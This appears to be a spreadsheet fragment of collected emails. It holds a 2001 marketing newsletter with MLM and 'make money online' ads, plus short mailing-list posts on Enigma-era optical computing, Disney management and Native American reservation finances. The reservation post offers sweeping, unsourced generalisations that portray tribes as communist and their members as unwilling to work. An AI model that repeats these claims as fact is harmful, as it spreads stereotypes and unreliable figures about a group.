 		&lt;table border="0" cellpadding="4" cellspacing="0" width="100%"&gt;
          &lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="top"&gt;&lt;a name="article1"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Top Ten Most Important Things to Do Today&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;This is my list. They're the ones I've selected for my life at
 &lt;br&gt;present. Consider them suggestions for yourself--ideas to
 &lt;br&gt;help you generate your own top ten list. By getting clear
 &lt;br&gt;on and acting upon YOUR most important steps, you'll be
 &lt;br&gt;moving toward and experiencing your highest and best.
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;1. Practice gratefulness. Reflect upon the things in my life for
 &lt;br&gt;which I'm grateful. If I appreciate more of what I have, I will
 &lt;br&gt;have even more to appreciate.
 &lt;p&gt;2. Write out my three most important goals and visualize
 &lt;br&gt;how my life will be when I have achieved them. FEEL it.
 &lt;br&gt;EXPERIENCE it in as much sensory detail as I can possibly
 &lt;br&gt;imagine.
 &lt;p&gt;3. Take some action steps toward each of the three goals.
 &lt;p&gt;4. Exercise my body and monitor carefully what I eat and
 &lt;br&gt;drink. Reduce fat and caloric intake while expending more
 &lt;br&gt;calories. Eat only small amounts at one time.
 &lt;p&gt;5. Read something educational, inspirational or
 &lt;br&gt;entertaining--preferably all three.
 &lt;p&gt;6. Meditate. Empty my conscious mind and listen to the
 &lt;br&gt;Super-conscious.
 &lt;p&gt;7. Have fun doing something I love to do. Experience joy.
 &lt;p&gt;8. Write something--anything. If not an article or part of
 &lt;br&gt;my book, then write in my journal.
 &lt;p&gt;9. Perform some act of kindness. Do a thoughtful,
 &lt;br&gt;magnanimous thing--anonymously if possible.
 &lt;p&gt;10. Finish something. Do something I can call complete.
 &lt;p&gt;Bonus Step: Make something work better --
 &lt;br&gt;Practice ADS: Automate, Delegate and Systemize.
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;Copyright 2001 Michael Angier &amp;amp; Success Networks International.
 &lt;br&gt;-------------------------------------
 &lt;br&gt;About the Author...
 &lt;p&gt;Michael Angier is the founder and president of Success Networks.
 &lt;br&gt;Success Net's mission is to inform, inspire and empower people
 &lt;br&gt;to be their best--personally and professionally. Download their
 &lt;br&gt;free eBooklet, KEYS TO PERSONAL EFFECTIVENESS from
 &lt;br&gt;&lt;a href="http://www.SuccessNet.org/keys.htm"&gt;http://www.SuccessNet.org/keys.htm&lt;/a&gt;.
 Free subscriptions,
 &lt;br&gt;memberships, books and SuccessMark Cards are available at
 &lt;br&gt;&lt;a href="http://www.SuccessNet.org"&gt;http://www.SuccessNet.org&lt;/a&gt;&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
          &lt;tr&gt;&lt;td bgcolor="#DBE8F4" colspan="2" valign="top"&gt;&lt;a name="article2"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Member Showcase&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;&lt;i&gt;Examine carefully - Those with email addresses included WILL&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;TRADE LINKS with you... You are encouraged to contact them.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;There Are Many Ways To Build A Successful Business - Just look &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;at these successful sites &amp;amp; programs other members are involved
 in...&lt;/i&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;******** FREE CD-Rom Software *********
 &lt;br&gt;Over 1000 high quality software titles on CD-ROM
 &lt;br&gt;absolutely FREE! YES, the software is free, (s/h)
 &lt;br&gt;Click Here: &lt;a href="http://www.adreporting.com/at.cgi?a=156074&amp;e=/2/"&gt;http://www.adreporting.com/at.cgi?a=156074&amp;amp;e=/2/&lt;/a&gt;
 &lt;br&gt;---------------------------------------------------------------------
 &lt;p&gt;Stop Smoking - Free Lesson !!
 &lt;br&gt;Discover the Secret to Stopping Smoking.
 &lt;br&gt;To Master these Powerful Techniques, Come to
 &lt;br&gt;&lt;a href="http://www.breath-of-life.net"&gt;http://www.breath-of-life.net&lt;/a&gt;
 for your Free Lesson.
 &lt;br&gt;Act Now!&amp;nbsp; P.S. Tell someone you care about.
 &lt;br&gt;Trade Links - &lt;a href="mailto:jturco3@hotmail.com"&gt;jturco3@hotmail.com&lt;/a&gt;
 &lt;br&gt;---------------------------------------------------------------------
 &lt;p&gt;For a limited time only, we are offering --TWO-- FREE eBooks
 &lt;br&gt;to show you how to MAKE MONEY ON THE INTERNET!
 &lt;br&gt;Use our PROVEN, DUPLICATABLE methods to get in on
 &lt;br&gt;this EXPLODING opportunity now!&amp;nbsp; Visit us at:
 &lt;br&gt;&lt;a href="http://www.Abundance-Group.com"&gt;http://www.Abundance-Group.com&lt;/a&gt;
 to collect your FREE offers!
 &lt;br&gt;Trade Links - &lt;a href="mailto:Gina@AbundanceGroup.com"&gt;Gina@AbundanceGroup.com&lt;/a&gt;
 &lt;br&gt;---------------------------------------------------------------------
 &lt;p&gt;Life Without Debt! What would you do with 5,000 10,000
 &lt;br&gt;20,000 100,000? A "Dream Team" of heavy hitters are
 &lt;br&gt;gathering to promote Life Without Debt. Get in NOW to
 &lt;br&gt;receive Massive spillover in the 2x matrix.
 &lt;br&gt;&lt;a href="http://trafficentral.com/lwd/index.htm"&gt;http://trafficentral.com/lwd/index.htm&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;&lt;i&gt;If you have a product, service, opportunity or quality &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;merchandise that appeals to people worldwide, reach your targeted audience!&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For a fraction of what other large newsletters charge you can &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;exhibit your website here, and trade links for only $8 CPM.&amp;nbsp; &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Compare that to the industry average of $10-$15 CPM. 
 &lt;br&gt;Why?... Because as a valuable member we want you &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;to be successful! Order today -&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Showcases are limited and published on a first come, first serve
 basis.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For our secure order form, click here:&lt;/i&gt; &lt;a href="http://bannersgomlm.com/ezine"&gt;http://bannersgomlm.com/ezine&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
 		 &lt;tr&gt;&lt;td bgcolor="#FFFFFF" colspan="2" valign="top"&gt;&lt;a name="article3"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Commentary Quick Tips&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFFFFF" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;Website Recommendation:
 &lt;p&gt;Here is a site with some useful tips.
 &lt;br&gt;Example - test your Internet connection speed.
 &lt;br&gt;&lt;a href="http://www.camscape.com/tips/"&gt;http://www.camscape.com/tips/&lt;/a&gt;
 &lt;br&gt;I doubled my DSL speed with just one minor tweak
 &lt;br&gt;suggested by one of the links given.
 &lt;p&gt;Submitted by F. Knopke
 &lt;br&gt;imco@telusplanet.net
 &lt;br&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 &lt;p&gt;Do you have a marketing hint, product recommendation, or
 &lt;br&gt;online gem of wisdom you'd like to share with your fellow
 &lt;br&gt;subscribers? With your 2 - 10 line Quick Tip include your
 &lt;br&gt;name and URL or email address and&amp;nbsp; we'll give you credit
 &lt;br&gt;for your words of wisdom.
 &lt;p&gt;And, if you're looking for free advertising, this isn't
 &lt;br&gt;the place - check out the 'One Question Survey' below for
 &lt;br&gt;a great free advertising offer.
 &lt;p&gt;Send it in to &lt;a href="mailto:Submit@AEOpublishing.com"&gt;mailto:Submit@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;with 'Quick Tip' in the Subject block.&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
 		 &lt;tr&gt;&lt;td bgcolor="#DBE8F4" colspan="2" valign="top"&gt;&lt;a name="article4"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Win A FREE Ad In Community &amp; Commentary&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;To keep this interesting, how about this, every month we'll
 &lt;br&gt;draw a name from the replies and that person will win one
 &lt;br&gt;Sponsorship Showcase in the Community &amp;amp; Commentary, for FREE.
 &lt;br&gt;That's a value of over $800.00! Respond to each weekly survey,
 &lt;br&gt;and increase your chances to win with four separate entries.
 &lt;p&gt;&amp;nbsp;QUESTION OF THE WEEK (08/03/01)...
 &lt;br&gt;&amp;nbsp;No right or wrong answers, and just by answering
 &lt;br&gt;&amp;nbsp;you are entered to win a Sponsorship Showcase&amp;nbsp; - Free!
 &lt;p&gt;&amp;nbsp;~~~ How many email messages do you get per day? ~~~
 &lt;p&gt;Less than 40&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:one@AEOpublishing.com"&gt;mailto:one@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;41-100&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:two@AEOpublishing.com"&gt;mailto:two@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;101-300&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:three@AEOpublishing.com"&gt;mailto:three@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;301-1000&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:four@AEOpublishing.com"&gt;mailto:four@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;More than 1000&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="mailto:five@AEOpublishing.com"&gt;mailto:five@AEOpublishing.com&lt;/a&gt;
 &lt;p&gt;To make this as easy as possible for you, just click on the
 &lt;br&gt;hyperlinked answer to send us an e-mail&amp;nbsp; - you do not need to
 &lt;br&gt;enter any information in the subject or body of the message.
 &lt;p&gt;** ADD YOUR COMMENTS!&amp;nbsp; Follow directions above and
 &lt;br&gt;add your comments in the body of the message, and we'll
 &lt;br&gt;post the best commentaries along with the responses.
 &lt;p&gt;You will automatically be entered in our drawing for a free
 &lt;br&gt;Sponsorship ad in the Community &amp;amp; Commentary. Please
 &lt;br&gt;respond only one time per question.&amp;nbsp; Multiple responses
 &lt;br&gt;from the same individual will be discarded.
 &lt;p&gt;Last Weeks's Survey Results &amp;amp; Comments&amp;nbsp; (07/27/01)
 &lt;p&gt;&amp;nbsp;~~~ Are you concerned about identity theft online? ~~~
 &lt;p&gt;yes&amp;nbsp;&amp;nbsp; 81%
 &lt;br&gt;no&amp;nbsp;&amp;nbsp;&amp;nbsp; 19%
 &lt;p&gt;Comments:
 &lt;br&gt;~~~~~~~~~
 &lt;p&gt;No. This is a funny thing to me.&amp;nbsp; I hear about so many
 &lt;br&gt;people being super scared to give out their SS#.&amp;nbsp; Well folks,
 &lt;br&gt;I can get your SS# for 50 cents.&amp;nbsp; Give me a name and address
 &lt;br&gt;and about 90% of the time I can get the number.
 &lt;p&gt;We are so worried about putting our credit card number on
 &lt;br&gt;the net, but we will give the card to a waiter or waitress and
 &lt;br&gt;they take it out of our sight for 10 minutes.&amp;nbsp; They could do
 &lt;br&gt;who knows what with the CC number.&amp;nbsp; I once had a person
 &lt;br&gt;tell me that her lawyer said that she should never fax a copy
 &lt;br&gt;of her check to anyone (checks by fax) because then that
 &lt;br&gt;person (me) would have her account info and could write
 &lt;br&gt;a check out for thousands of dollars.&amp;nbsp; I told her to just send
 &lt;br&gt;it to me then and she said that was OK.&amp;nbsp; Then I asked her
 &lt;br&gt;to tell me what the difference was between the original check
 &lt;br&gt;and a fax copy.&amp;nbsp; I told her to ask her lawyer that too.&amp;nbsp;
 Never
 &lt;br&gt;heard back from her.
 &lt;p&gt;The bottom line is that if a crook wants to get your info, it is
 &lt;br&gt;available in many places.&amp;nbsp; Have a good day.
 &lt;br&gt;--&amp;nbsp; Terry&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href="http://mysiteinc.com/tfn/lfi.html"&gt;
 http://mysiteinc.com/tfn/lfi.html&lt;/a&gt;
 &lt;br&gt;~~~~~~~~~
 &lt;p&gt;Yes. I believe that the risk is out there but minimal. However,
 &lt;br&gt;we can cut those risks by a few simple precautions. Most
 &lt;br&gt;importantly, never give any personal information at a site
 &lt;br&gt;that is not secure, always look for the lock in thetask bar
 &lt;br&gt;or a Veri secure sign or others.
 &lt;p&gt;Also, never leave your information stored at a site. I put
 &lt;br&gt;in my credit information in each time instead of having
 &lt;br&gt;an account in standing, a little more time but less risks
 &lt;br&gt;involved! Of course, I mostly shop at my own Internet
 &lt;br&gt;mall and I know how safe it is there, credit card info is
 &lt;br&gt;deleted in a matter of seconds. Overall, I believe the web
 &lt;br&gt;to be a safe and very fruitful new frontier!
 &lt;br&gt;--&amp;nbsp; Catherine F.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.catco.nexgenmall.com"&gt;http://www.catco.nexgenmall.com&lt;/a&gt;
 &lt;br&gt;~~~~~~~~~
 &lt;p&gt;Yes. I had phenomena for 6 weeks and did not realize that
 &lt;br&gt;my ISP was shut down at the same time because the owner
 &lt;br&gt;was in a bad car accident.&amp;nbsp; I had a full service account.
 &lt;br&gt;My Internic fees were not paid so my WEB Address
 &lt;br&gt;went unprotected.&amp;nbsp; A Russian stepped in; paid the fees;
 &lt;br&gt;and, promptly assigned my www.SchoolOfGeomatics.com
 &lt;br&gt;address to a porn shop.&amp;nbsp; Thus, I lost 4 years of building
 &lt;br&gt;up 1st place rankings on 12 Search Engines and 2nd place
 &lt;br&gt;on 8 more.&amp;nbsp; This set me back about 4&amp;nbsp; months: I believe I
 &lt;br&gt;lost a minimum of $50,000.
 &lt;br&gt;&amp;nbsp;
 &lt;br&gt;I have also been hit with viruses about 10 times.&amp;nbsp; The first
 &lt;br&gt;time I lost almost 4 months of work.&amp;nbsp; Now, I back up often
 &lt;br&gt;enough to not to lose so much time.&amp;nbsp; This is also Internet
 &lt;br&gt;theft.&amp;nbsp; These people are nothing but out and out criminals
 &lt;br&gt;and should spend years behind bars.
 &lt;br&gt;&amp;nbsp;
 &lt;br&gt;Customers are well protected from credit card theft;
 &lt;br&gt;however, merchants can lose a lot of money.&amp;nbsp; I sell only by
 &lt;br&gt;purchase order and certified or registered company checks.
 &lt;br&gt;--&amp;nbsp; Peter S.&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.GSSGeomatics.com"&gt;http://www.GSSGeomatics.com&lt;/a&gt;
 &lt;br&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 JULY WINNER ANNOUNCED!
 &lt;br&gt;And the July 'One-Question Survey' WINNER is...
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; John Stitzel&amp;nbsp;&amp;nbsp;
 -&amp;nbsp;&amp;nbsp; oldstitz@yahoo.com
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Congratulations John!&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
          &lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="top"&gt;&lt;a name="article5"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;To change your subscribed address,
 &lt;br&gt;send both new and old address to &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;br&gt;See the link (to the left) for our Subscription Center to unsubscribe or edit your interests.
 &lt;p&gt;Please send suggestions and comments to: &lt;a href="mailto:Editor@AEOpublishing.com"&gt;Editor&lt;/a&gt;
 &lt;br&gt;I invite you to send your real successes and showcase 
 your strategies and techniques, or yes, even your total bombs, 
 "Working Together We Can All Prosper." &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;p&gt;For information on how to sponsor Your Membership 
 Community &amp;amp; Commentary visit: &lt;a href="http://bannersgomlm.com/ezine"&gt;Sponsorship
 Showcase&lt;/a&gt;
 &lt;p&gt;Copyright 2001 AEOpublishing.com&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
         &lt;/table&gt;
 	&lt;!-- End Article Table --&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td bgcolor="EEEEDF" valign="bottom" align="center"&gt;
 	&lt;!-- Begin Email and Site URL Links --&gt;
 	&lt;hr color="#003366" size="1" width="100%"&gt;
 	&lt;font size="1" face="Verdana,Arial,Helvetica" color="#003366"&gt;
 	&lt;b&gt;&lt;a href="mailto:"&gt;&lt;font size="1" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;/font&gt;&lt;/a&gt; :: &lt;a href="http://www.AEOpublishing.com"&gt;&lt;font size="1" color="#003366"&gt;visit our site&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 	&lt;hr color="#003366" size="1" width="100%"&gt;
     &lt;b&gt; &lt;/b&gt;
     &lt;hr color="#003366" size="1" width="100%"&gt;
 	&lt;!-- End Email and Site URL Links --&gt;
 	&lt;!--  You are required by your Constant Contact user agreement to
 	    provide the opt-out link shown below as by the property 'OptOut'. --&gt;
     &lt;font size="1" face="Verdana,Arial,Helvetica"&gt;
     This email was sent to &lt;br&gt;jm@netnoteinc.com, &lt;br&gt;at your request, &lt;br&gt;by &lt;a href="http://ccprod.roving.com/roving/sa/s.jsp?id=bd7n7877.8lhtdma6"&gt;Your Membership Newsletter Services&lt;/a&gt;.  
     &lt;p&gt;Visit our Subscription Center &lt;br&gt;to &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.8lhtdma6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;edit&lt;/a&gt; your interests or &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.8lhtdma6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;unsubscribe&lt;/a&gt;.
     &lt;p&gt;View our &lt;a href="http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp"&gt;privacy policy&lt;/a&gt;.  
     &lt;p&gt;Powered by&lt;br&gt;&lt;a href="http://www.constantcontact.com/index.jsp?cc=ccnws" target="_blank"&gt;&lt;img src="http://ccprod.roving.com/roving/images/cc-logo-color-sm.gif" border="0" alt="Constant Contact"&gt;&lt;/a&gt;
     &lt;/font&gt;
     &lt;br&gt;&lt;br&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/HTML&gt;
 --1465727098.996838841831.JavaMail.RovAdmin.rovweb003--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Optical analog computing?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 Delivered-To: fork@example.com
 To: fork@example.com
 Subject: Re: Optical analog computing?
 From: Dave Long &lt;dl@silcom.com&gt;
 Sender: fork-admin@xent.com
 Date: Wed, 02 Oct 2002 11:09:34 -0700
 &gt; &gt; "the first computer to crack enigma was optical"
 &gt;
 &gt; Computing with interference patterns, etc, makes perfect sense, but Enigma
 &gt; was cracked by building mechanical systems that were essentially Enigma
 &gt; machines and brute-forcing.
 Look for "Zygalski sheets".
 By Koerner's* narrative, it wound up
 being a hybrid affair: Bletchley had
 mock Enigmas which cycled through the
 Enigma's ~18k starting positions in a
 quarter of an hour, but the Germans
 started using a plugboard which then
 had ~1.5x10^14 possibilities.  The
 Poles noticed that there were some
 patterns in the messages which were
 only possible via certain plugboard
 settings, and so:
 &gt; When we have collected several such cards corresponding to different
 &gt; initial signals ..., we place them in a pile so that the squares
 &gt; corresponding to the same daily settings are aligned and shine a
 &gt; light beneath the pile.  Only those squares which let the light
 &gt; through will correspond to possible daily settings.
 So the brute force hardware allowed
 precalculation of "optical" computing
 devices which then narrowed down the
 possibilities enough for brute force
 to again be used for daily decodes,
 until:
 &gt; On 10 May, the Germans invaded France and, on the same day, in
 &gt; accordance with the best cryptographic principles, they changed their
 &gt; Enigma procedures in such a way that the 1560 Zygalski sheets, each
 &gt; with their carefully drilled 1000 or so holes, became just so much
 &gt; waste cardboard.
 -Dave
 ::::::
 &gt; &gt; "the first synthetic-aperture-radar processor was optical"
 This is also easy to believe, given Dr.
 Elachi's description of the 1981 Shuttle
 Imaging Radar:
 &gt; The received signal is recorded on an optical film which is retrieved
 &gt; after landing.  The film ... is then processed in an optical correlator
 &gt; to generate the final image.
 which makes sense, as one wishes to shift
 each component of the return in proportion
 to its frequency, for which one presumably
 needs a glorified prism.
 &gt; Alternatively, the ... signal can be digitized and then recorded on
 &gt; board or transmitted to the ground via a digital data link.  This was
 &gt; the case with the ... sensor flown in 1984.
 ::::::
 * Koerner, _The Pleasures of Counting_,
 in which various aspects of the Enigma
 decoding cover four chapters, of which
 I quote from two sections of one:
 14.2: Beautiful Polish females, and
 14.3: Passing the torch
 &gt; Churchill's romantic soul loved the excitement and secrecy surrounding
 &gt; Bletchley.  He relished the way that
 &gt; &gt; [t]he old procedures, like the setting up of agents, the suborning
 &gt; &gt; of informants, the sending of messages written in invisible ink,
 &gt; &gt; the masquerading, the dressing-up, the secret transmitters, and the
 &gt; &gt; examining of the contents of waste-paper baskets, all turned out
 &gt; &gt; to be largely cover for this other source, as one might keep some
 &gt; &gt; old-established business in rare books going in order to be able,
 &gt; &gt; under cover of it, to do a thriving trade in pornography and erotica
 &gt; ...
 &gt; Looking at the disparate, unkempt and definitely unmilitary crew
 &gt; formed by his top code-breakers, he is said to have added to his head
 &gt; of Intelligence "I know I told you to leave no stone unturned to find
 &gt; the necessary staff, but I did not mean you to take me so literally!"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</si>
  <si>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the Hello Kitty vibrator has competition
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48393
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=48393
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Disney's no-good Park-Czar replaced
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506723
 Date: Not supplied
 Disney has named a new president of Walt Disney Parks, replacing Paul Pressler, 
 the exec who did his damnedest to ruin Disneyland, slashing spending (at the 
 expense of safety and employee satisfaction), building the craptastical 
 California Adventure, reducing the number of SKUs available for sale in the 
 Park stores, and so on. The new president, James Rasulo, used to be head of 
 Euro Disney. Link[1] Discuss[2]
 [1] http://reuters.com/news_article.jhtml?type=search&amp;StoryID=1510778
 [2] http://www.quicktopic.com/boing/H/rw7cDXT3W44C
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Native American economics (was Re: sed /s/United States/Roman
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I wanted to get back to this but didn't have the time.  I actually lived on
 a couple different Indian reservations growing up in the Pacific Northwest
 and also spent a fair amount time in Lakota/Sioux country as well.  And my
 parents have lived on an even more diverse range of Indian reservations than
 I have (my experience being a direct result of living with my parents).  I
 do get a lot of my information first-hand, or in some cases, second-hand
 from my father.
 The income figures for the Indians are somewhat misleading, mostly because
 it is really hard to do proper accounting of the effective income.  While it
 is true that some Indians live in genuine poverty, it is typically as a
 consequence of previous poor decisions that were made by the tribe, not
 something that was impressed upon them.
 The primary problem with the accounting is that there is a tribal entity
 that exists separately from the individuals, typically an "Indian
 Corporation" of one type or another where each member of the tribe owns a
 single share (the details of when and how a share becomes active varies from
 tribe to tribe).  In most tribes, a dividend is paid out to each of the
 tribal members from the corporation, usually to the tune of $10-30k per
 person, depending on the tribe.  The dividend money comes from a number of
 places, with the primary sources being the Federal Gov't and various
 businesses/assets owned by the Indian corporation.
 You have to understand a couple things:  First, a great many Indian tribes
 are run as purely communist enterprises.  Everyone gets a check for their
 share no matter what.  One of the biggest problems this has caused is very
 high unemployment (often 70-90%) for tribal members, who are more than happy
 take their dividend and not work.  The dividend they receive from the
 corporation often constitutes their sole "income" for government accounting
 purposes.  Unfortunately, to support this type of economics when no one
 works, they've had to sell off most of their useful assets to maintain those
 dividends.  Many of the tribes genuinely living in poverty do so because
 they have run out of things to sell yet nobody works.  One of the ironies is
 that on many of the reservations where the tribes still have assets to burn,
 many of the people working in the stores and such are actually poor white
 folk, not Indians.
 Second, even though the tribe members each get a cash dividend, they also
 receive an enormous range of benefits and perks from the Indian corporation
 to the tune of tens of thousands of dollars per person annually.  By
 benefits and perks, we are talking about the kinds of things no other
 ordinary American receives from either their employer or the government.
 It should be pointed out that while many of these Indian corporations are
 ineptly run, and mostly provide sinecures for other Indians, a minority are
 very smartly managed and a few hire non-Indian business executives with good
 credentials to run their business divisions.  An example of this is the
 Haida Corporation, which while having less 1,000 tribal shareholders, has
 billions of dollars in assets and the various corporations they own have
 gross revenues in the $200-300 million range (and growing).  Yet the
 dividend paid out is strictly controlled, about $20k in this particular
 case, and they engaged in a practice of waiting a couple decades before
 drawing money from any of the assets they were granted which has led to
 intelligent investment and use.  They don't eat their seed corn, and have
 actually managed to grow their stash.  In contrast, a couple islands over,
 there is another tribe of ~2,000 people that has a net loss of about $50
 million annually IIRC while being regularly endowed by the Federal
 government with several billions of dollars in valuable assets.  This
 particular tribe has a modest income in theory, but the actual expenditures
 per person annually is in the hundreds of thousands of dollars, and many
 borrow money against future income.  Incidentally, in this particular case,
 the people that ARE working frequently pull in a few hundred thousand
 dollars a year, much of which goes back to the tribal corporation rather
 than their own pockets.
